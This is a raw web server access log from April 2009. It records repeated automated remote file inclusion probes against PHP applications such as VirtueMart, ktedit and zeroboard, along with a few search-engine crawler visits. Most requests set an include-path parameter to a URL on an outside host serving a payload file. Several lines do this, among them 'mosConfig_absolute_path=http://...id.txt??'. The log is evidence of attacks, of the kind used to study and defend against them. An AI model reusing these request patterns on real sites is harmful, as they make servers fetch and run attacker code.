81.176.226.164 - - [17/Apr/2009:07:55:40 -0500] "GET /logs/access_log.1238198400/?DOCUMENT_ROOT=http://www.shn.be//components/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
81.176.226.164 - - [17/Apr/2009:07:57:14 -0500] "GET /?DOCUMENT_ROOT=http://www.shn.be//components/id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
81.176.226.164 - - [17/Apr/2009:07:57:14 -0500] "GET /logs/access_log.1236297600/?DOCUMENT_ROOT=http://www.shn.be//components/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
81.176.226.164 - - [17/Apr/2009:07:57:15 -0500] "GET /logs/?DOCUMENT_ROOT=http://www.shn.be//components/id.txt?? HTTP/1.1" 200 185881 "-""Mozilla/5.0"
81.176.226.164 - - [17/Apr/2009:07:57:18 -0500] "GET /logs/access_log.1235692800/?DOCUMENT_ROOT=http://www.shn.be//components/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
67.212.165.114 - - [17/Apr/2009:07:57:59 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.bernardyni.ofm.pl/organy1/tmp/zero/id.txt???? HTTP/1.1" 404 339 "-""libwww-perl/5.810"
67.212.165.114 - - [17/Apr/2009:07:57:59 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.bernardyni.ofm.pl/organy1/tmp/zero/id.txt???? HTTP/1.1" 404 334 "-""libwww-perl/5.810"
65.55.106.133 - - [17/Apr/2009:08:01:48 -0500] "GET /logs/access_log.1147305600 HTTP/1.0" 200 843 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.145 - - [17/Apr/2009:08:02:02 -0500] "GET /logs/access_log.1173312000 HTTP/1.0" 200 4920 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
218.27.203.107 - - [17/Apr/2009:08:07:23 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
218.27.203.107 - - [17/Apr/2009:08:07:23 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
218.27.203.107 - - [17/Apr/2009:08:07:24 -0500] "GET /logs/access_log.1238803200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
202.75.4.169 - - [17/Apr/2009:08:10:44 -0500] "GET /logs/errors.php?error=http://home.covenantberks.org/images/kampret.jpg?? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
202.75.4.169 - - [17/Apr/2009:08:10:44 -0500] "GET /errors.php?error=http://home.covenantberks.org/images/kampret.jpg?? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
84.232.4.1 - - [17/Apr/2009:08:16:19 -0500] "GET /includes/class_item.php?fileExtension=http://www.reeftastic.com/cart/media/index/bo.do?%0D?? HTTP/1.1" 404 306 "-""libwww-perl/5.803"
84.232.4.1 - - [17/Apr/2009:08:16:19 -0500] "GET /logs/includes/class_item.php?fileExtension=http://www.reeftastic.com/cart/media/index/bo.do?%0D?? HTTP/1.1" 404 311 "-""libwww-perl/5.803"
60.251.60.100 - - [17/Apr/2009:08:16:23 -0500] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://www.candidography.com/zero/id1.txt??? HTTP/1.1" 404 315 "-""Mozilla/5.0"
60.251.60.100 - - [17/Apr/2009:08:16:23 -0500] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.candidography.com/zero/id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
60.251.60.100 - - [17/Apr/2009:08:16:23 -0500] "GET /logs/access_log.1233705600/includes/ktedit/toolbar.php?dirDepth=http://www.candidography.com/zero/id1.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
60.251.60.100 - - [17/Apr/2009:08:16:24 -0500] "GET /logs/access_log.1235001600/includes/ktedit/toolbar.php?dirDepth=http://www.candidography.com/zero/id1.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
60.251.60.100 - - [17/Apr/2009:08:16:24 -0500] "GET /logs/access_log.1238803200/includes/ktedit/toolbar.php?dirDepth=http://www.candidography.com/zero/id1.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
60.251.60.100 - - [17/Apr/2009:08:16:26 -0500] "GET /logs/access_log.1234483200/includes/ktedit/toolbar.php?dirDepth=http://www.candidography.com/zero/id1.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
60.251.60.100 - - [17/Apr/2009:08:16:26 -0500] "GET /logs/access_log.1234224000/includes/ktedit/toolbar.php?dirDepth=http://www.candidography.com/zero/id1.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
60.251.60.100 - - [17/Apr/2009:08:16:26 -0500] "GET /logs/access_log.1232668800/includes/ktedit/toolbar.php?dirDepth=http://www.candidography.com/zero/id1.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
60.251.60.100 - - [17/Apr/2009:08:16:26 -0500] "GET /logs/access_log.1234656000/includes/ktedit/toolbar.php?dirDepth=http://www.candidography.com/zero/id1.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
60.251.60.100 - - [17/Apr/2009:08:16:46 -0500] "GET /logs/access_log.1233792000/includes/ktedit/toolbar.php?dirDepth=http://www.candidography.com/zero/id1.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
60.251.60.100 - - [17/Apr/2009:08:16:46 -0500] "GET /logs/access_log.1234742400/includes/ktedit/toolbar.php?dirDepth=http://www.candidography.com/zero/id1.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
60.251.60.100 - - [17/Apr/2009:08:16:46 -0500] "GET /logs/access_log.1233100800/includes/ktedit/toolbar.php?dirDepth=http://www.candidography.com/zero/id1.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
60.251.60.100 - - [17/Apr/2009:08:16:47 -0500] "GET /logs/access_log.1231113600/includes/ktedit/toolbar.php?dirDepth=http://www.candidography.com/zero/id1.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
60.251.60.100 - - [17/Apr/2009:08:16:47 -0500] "GET /logs/access_log.1233619200/includes/ktedit/toolbar.php?dirDepth=http://www.candidography.com/zero/id1.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
60.251.60.100 - - [17/Apr/2009:08:16:48 -0500] "GET /logs/access_log.1231027200/includes/ktedit/toolbar.php?dirDepth=http://www.candidography.com/zero/id1.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
60.251.60.100 - - [17/Apr/2009:08:16:48 -0500] "GET /logs/access_log.1233014400/includes/ktedit/toolbar.php?dirDepth=http://www.candidography.com/zero/id1.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
60.251.60.100 - - [17/Apr/2009:08:16:49 -0500] "GET /logs/access_log.1233532800/includes/ktedit/toolbar.php?dirDepth=http://www.candidography.com/zero/id1.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
60.251.60.100 - - [17/Apr/2009:08:16:49 -0500] "GET /logs/access_log.1235520000/includes/ktedit/toolbar.php?dirDepth=http://www.candidography.com/zero/id1.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
60.251.60.100 - - [17/Apr/2009:08:16:49 -0500] "GET /logs/access_log.1233360000/includes/ktedit/toolbar.php?dirDepth=http://www.candidography.com/zero/id1.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
60.251.60.100 - - [17/Apr/2009:08:16:49 -0500] "GET /logs/access_log.1235433600/includes/ktedit/toolbar.php?dirDepth=http://www.candidography.com/zero/id1.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
60.251.60.100 - - [17/Apr/2009:08:16:49 -0500] "GET /logs/access_log.1235347200/includes/ktedit/toolbar.php?dirDepth=http://www.candidography.com/zero/id1.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
60.251.60.100 - - [17/Apr/2009:08:16:49 -0500] "GET /logs/access_log.1235260800/includes/ktedit/toolbar.php?dirDepth=http://www.candidography.com/zero/id1.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
60.251.60.100 - - [17/Apr/2009:08:16:49 -0500] "GET /logs/access_log.1234828800/includes/ktedit/toolbar.php?dirDepth=http://www.candidography.com/zero/id1.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
60.251.60.100 - - [17/Apr/2009:08:16:49 -0500] "GET /logs/access_log.1235174400/includes/ktedit/toolbar.php?dirDepth=http://www.candidography.com/zero/id1.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
60.251.60.100 - - [17/Apr/2009:08:16:49 -0500] "GET /logs/access_log.1233878400/includes/ktedit/toolbar.php?dirDepth=http://www.candidography.com/zero/id1.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
60.251.60.100 - - [17/Apr/2009:08:16:49 -0500] "GET /logs/access_log.1236729600/includes/ktedit/toolbar.php?dirDepth=http://www.candidography.com/zero/id1.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
60.251.60.100 - - [17/Apr/2009:08:16:50 -0500] "GET /logs/access_log.1238630400/includes/ktedit/toolbar.php?dirDepth=http://www.candidography.com/zero/id1.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
60.251.60.100 - - [17/Apr/2009:08:16:50 -0500] "GET /logs/access_log.1235692800/includes/ktedit/toolbar.php?dirDepth=http://www.candidography.com/zero/id1.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
60.251.60.100 - - [17/Apr/2009:08:16:50 -0500] "GET /logs/access_log.1234137600/includes/ktedit/toolbar.php?dirDepth=http://www.candidography.com/zero/id1.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
60.251.60.100 - - [17/Apr/2009:08:16:51 -0500] "GET /logs/access_log.1235088000/includes/ktedit/toolbar.php?dirDepth=http://www.candidography.com/zero/id1.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
60.251.60.100 - - [17/Apr/2009:08:16:51 -0500] "GET /logs/access_log.1237075200/includes/ktedit/toolbar.php?dirDepth=http://www.candidography.com/zero/id1.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
60.251.60.100 - - [17/Apr/2009:08:16:52 -0500] "GET /logs/access_log.1237420800/includes/ktedit/toolbar.php?dirDepth=http://www.candidography.com/zero/id1.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
60.251.60.100 - - [17/Apr/2009:08:16:52 -0500] "GET /logs/access_log.1237248000/includes/ktedit/toolbar.php?dirDepth=http://www.candidography.com/zero/id1.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
60.251.60.100 - - [17/Apr/2009:08:16:52 -0500] "GET /logs/access_log.1235865600/includes/ktedit/toolbar.php?dirDepth=http://www.candidography.com/zero/id1.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
67.153.147.244 - - [17/Apr/2009:08:18:53 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.look22.de/slideshow/javascript/copyright.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
67.153.147.244 - - [17/Apr/2009:08:18:53 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.look22.de/slideshow/javascript/copyright.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
67.153.147.244 - - [17/Apr/2009:08:18:53 -0500] "GET /logs/access_log.1238803200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.look22.de/slideshow/javascript/copyright.txt? HTTP/1.1" 404 361 "-""Mozilla/5.0"
218.27.203.107 - - [17/Apr/2009:08:20:40 -0500] "GET /logs/access_log.1238630400//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
67.153.147.244 - - [17/Apr/2009:08:23:32 -0500] "GET /logs/access_log.1238630400//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.look22.de/slideshow/javascript/copyright.txt? HTTP/1.1" 404 361 "-""Mozilla/5.0"
72.29.93.130 - - [17/Apr/2009:08:24:54 -0500] "GET /includes/class_item.php?fileExtension=http://www.reeftastic.com/cart/media/index/bo.do?%0D?? HTTP/1.1" 404 306 "-""libwww-perl/5.810"
72.29.93.130 - - [17/Apr/2009:08:24:54 -0500] "GET /logs/includes/class_item.php?fileExtension=http://www.reeftastic.com/cart/media/index/bo.do?%0D?? HTTP/1.1" 404 311 "-""libwww-perl/5.810"
210.109.101.217 - - [17/Apr/2009:08:25:48 -0500] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://mallorca.nu/joomla_shop/components/com_poll/errors.txt?? HTTP/1.1" 404 353 "-""libwww-perl/5.79"
210.109.101.217 - - [17/Apr/2009:08:25:48 -0500] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://mallorca.nu/joomla_shop/components/com_poll/errors.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.79"
66.225.215.166 - - [17/Apr/2009:08:28:10 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
66.225.215.166 - - [17/Apr/2009:08:28:10 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
66.225.215.166 - - [17/Apr/2009:08:28:10 -0500] "GET /logs/access_log.1236729600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
82.141.129.7 - - [17/Apr/2009:08:28:50 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hajobakker.com/portfolio/idont.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
82.141.129.7 - - [17/Apr/2009:08:28:50 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hajobakker.com/portfolio/idont.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
82.141.129.7 - - [17/Apr/2009:08:28:50 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hajobakker.com/portfolio/idont.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
82.141.129.7 - - [17/Apr/2009:08:28:50 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hajobakker.com/portfolio/idont.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
202.75.4.169 - - [17/Apr/2009:08:29:54 -0500] "GET /logs/errors.php?error=http://home.covenantberks.org/images/kampret.jpg?? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
202.75.4.169 - - [17/Apr/2009:08:29:54 -0500] "GET /errors.php?error=http://home.covenantberks.org/images/kampret.jpg?? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
66.225.215.166 - - [17/Apr/2009:08:30:07 -0500] "GET /logs/access_log.1238803200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
65.55.208.130 - - [17/Apr/2009:08:30:40 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.130 - - [17/Apr/2009:08:30:42 -0500] "GET /logs/access_log.1135123200 HTTP/1.1" 200 3506 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.130 - - [17/Apr/2009:08:32:29 -0500] "GET /logs/access_log.1219449600 HTTP/1.1" 200 781 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
82.141.129.7 - - [17/Apr/2009:08:41:28 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hajobakker.com/portfolio/idoisir.txt??? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
82.141.129.7 - - [17/Apr/2009:08:41:28 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hajobakker.com/portfolio/idoisir.txt??? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
82.141.129.7 - - [17/Apr/2009:08:44:50 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hajobakker.com/portfolio/idont.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
82.141.129.7 - - [17/Apr/2009:08:44:50 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hajobakker.com/portfolio/idont.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
82.141.129.7 - - [17/Apr/2009:08:44:56 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hajobakker.com/portfolio/idont.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
82.141.129.7 - - [17/Apr/2009:08:44:56 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hajobakker.com/portfolio/idont.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
82.141.129.7 - - [17/Apr/2009:08:46:39 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hajobakker.com/portfolio/albid.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
82.141.129.7 - - [17/Apr/2009:08:46:39 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hajobakker.com/portfolio/albid.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
64.56.65.106 - - [17/Apr/2009:08:48:23 -0500] "GET /logs//appserv/index.php?http://www.polarhome.com:793/~bizkut/as.txt????? HTTP/1.1" 404 306 "-""libwww-perl/5.819"
64.56.65.106 - - [17/Apr/2009:08:48:23 -0500] "GET //appserv/index.php?http://www.polarhome.com:793/~bizkut/as.txt????? HTTP/1.1" 404 301 "-""libwww-perl/5.819"
82.79.231.103 - - [17/Apr/2009:08:49:15 -0500] "GET /logs//include/write.php?dir=http://www.bsdhz.ch//assets/media/Roseid.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.803"
82.79.231.103 - - [17/Apr/2009:08:49:15 -0500] "GET //include/write.php?dir=http://www.bsdhz.ch//assets/media/Roseid.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.803"
82.79.231.103 - - [17/Apr/2009:08:50:30 -0500] "GET /logs//errors.php?error=http://www.bsdhz.ch//assets/media/Roseid.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
82.79.231.103 - - [17/Apr/2009:08:50:31 -0500] "GET //errors.php?error=http://www.bsdhz.ch//assets/media/Roseid.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
77.221.130.13 - - [17/Apr/2009:08:53:48 -0500] "GET //ggdo/?_zb_path=http://www.ohnnurychurch.org/bbs/nyot/id1.txt?? HTTP/1.1" 404 289 "-""Mozilla/5.0"
77.221.130.13 - - [17/Apr/2009:08:53:48 -0500] "GET /logs/access_log.1230508800//ggdo/?_zb_path=http://www.ohnnurychurch.org/bbs/nyot/id1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
77.221.130.13 - - [17/Apr/2009:08:53:48 -0500] "GET /logs//ggdo/?_zb_path=http://www.ohnnurychurch.org/bbs/nyot/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
77.221.130.13 - - [17/Apr/2009:08:54:30 -0500] "GET //ggdo/?_zb_path=http://www.ohnnurychurch.org/bbs/nyot/id1.txt?? HTTP/1.1" 404 289 "-""Mozilla/5.0"
77.221.130.13 - - [17/Apr/2009:08:54:30 -0500] "GET /logs//ggdo/?_zb_path=http://www.ohnnurychurch.org/bbs/nyot/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
77.221.130.13 - - [17/Apr/2009:08:54:30 -0500] "GET /logs/access_log.1230508800//ggdo/?_zb_path=http://www.ohnnurychurch.org/bbs/nyot/id1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
200.213.0.1 - - [17/Apr/2009:08:54:59 -0500] "GET //agenda.php3?rootagenda=http://sito.blackdrag0n.net/Cartoon/fx/fx1.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
200.213.0.1 - - [17/Apr/2009:08:54:59 -0500] "GET /logs//agenda.php3?rootagenda=http://sito.blackdrag0n.net/Cartoon/fx/fx1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
200.213.0.1 - - [17/Apr/2009:08:55:01 -0500] "GET /logs/access_log.1235606400//agenda.php3?rootagenda=http://sito.blackdrag0n.net/Cartoon/fx/fx1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
81.69.176.185 - - [17/Apr/2009:08:55:36 -0500] "GET /logs/modules/Forums/admin/admin_forum_prune.php?phpEx=http://dhcom.co.kr/pds/photo/child.gif?? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
81.69.176.185 - - [17/Apr/2009:08:55:37 -0500] "GET /modules/Forums/admin/admin_forum_prune.php?phpEx=http://dhcom.co.kr/pds/photo/child.gif?? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
208.64.202.134 - - [17/Apr/2009:08:56:54 -0500] "GET /logs/access_log.1236816000//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.jobs.traders.cc//id?? HTTP/1.1" 404 336 "-""Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
208.64.202.134 - - [17/Apr/2009:08:56:54 -0500] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.jobs.traders.cc//id?? HTTP/1.1" 404 309 "-""Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
208.64.202.134 - - [17/Apr/2009:08:56:54 -0500] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.jobs.traders.cc//id?? HTTP/1.1" 404 314 "-""Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
208.64.202.134 - - [17/Apr/2009:08:56:54 -0500] "GET /logs/access_log.1236902400//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.jobs.traders.cc//id?? HTTP/1.1" 404 336 "-""Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
208.64.202.134 - - [17/Apr/2009:08:57:15 -0500] "GET /logs/access_log.1238112000//ashnews.php?pathtoashnews=http://www.jobs.traders.cc//id?? HTTP/1.1" 404 322 "-""Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
208.64.202.134 - - [17/Apr/2009:08:57:15 -0500] "GET //ashnews.php?pathtoashnews=http://www.jobs.traders.cc//id?? HTTP/1.1" 404 295 "-""Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
208.64.202.134 - - [17/Apr/2009:08:57:15 -0500] "GET /logs//ashnews.php?pathtoashnews=http://www.jobs.traders.cc//id?? HTTP/1.1" 404 300 "-""Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
82.141.129.7 - - [17/Apr/2009:09:01:43 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hajobakker.com/portfolio/idont.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
82.141.129.7 - - [17/Apr/2009:09:01:44 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hajobakker.com/portfolio/idont.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
82.141.129.7 - - [17/Apr/2009:09:01:51 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hajobakker.com/portfolio/idont.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
82.141.129.7 - - [17/Apr/2009:09:01:52 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hajobakker.com/portfolio/idont.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
82.141.129.7 - - [17/Apr/2009:09:03:07 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hajobakker.com/portfolio/albid.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
82.141.129.7 - - [17/Apr/2009:09:03:08 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hajobakker.com/portfolio/albid.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
72.51.38.41 - - [17/Apr/2009:09:03:50 -0500] "GET /?_zb_path=http://www.adribessa.com//components/com_sef/1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
72.51.38.41 - - [17/Apr/2009:09:03:50 -0500] "GET /logs/access_log.1230422400/?_zb_path=http://www.adribessa.com//components/com_sef/1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
72.51.38.41 - - [17/Apr/2009:09:03:51 -0500] "GET /logs/?_zb_path=http://www.adribessa.com//components/com_sef/1.txt?? HTTP/1.1" 200 185881 "-""Mozilla/5.0"
65.55.208.144 - - [17/Apr/2009:09:04:38 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.144 - - [17/Apr/2009:09:04:38 -0500] "GET /logs/access_log.1133049600 HTTP/1.1" 200 489 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
116.121.201.70 - - [17/Apr/2009:09:11:29 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://ssdnb.net/bbs/vo.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.65"
210.109.101.217 - - [17/Apr/2009:09:11:30 -0500] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://in.geocities.com/awalaboyz/cid.txt??? HTTP/1.1" 404 353 "-""libwww-perl/5.79"
210.109.101.217 - - [17/Apr/2009:09:11:31 -0500] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://in.geocities.com/awalaboyz/cid.txt??? HTTP/1.1" 404 348 "-""libwww-perl/5.79"
116.121.201.70 - - [17/Apr/2009:09:11:32 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://ssdnb.net/bbs/vo.txt? HTTP/1.1" 404 315 "-""libwww-perl/5.65"
67.212.165.114 - - [17/Apr/2009:09:12:48 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.ohnnurychurch.org/bbs/skin/idi.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.810"
67.212.165.114 - - [17/Apr/2009:09:12:48 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.ohnnurychurch.org/bbs/skin/idi.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.810"
67.212.165.114 - - [17/Apr/2009:09:12:53 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.ohnnurychurch.org/bbs/skin/idi.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.810"
67.212.165.114 - - [17/Apr/2009:09:12:53 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.ohnnurychurch.org/bbs/skin/idi.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.810"
67.212.165.114 - - [17/Apr/2009:09:19:42 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.ohnnurychurch.org/bbs/skin/idi.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.810"
67.212.165.114 - - [17/Apr/2009:09:19:42 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.ohnnurychurch.org/bbs/skin/idi.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.810"
67.212.165.114 - - [17/Apr/2009:09:19:46 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.ohnnurychurch.org/bbs/skin/idi.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.810"
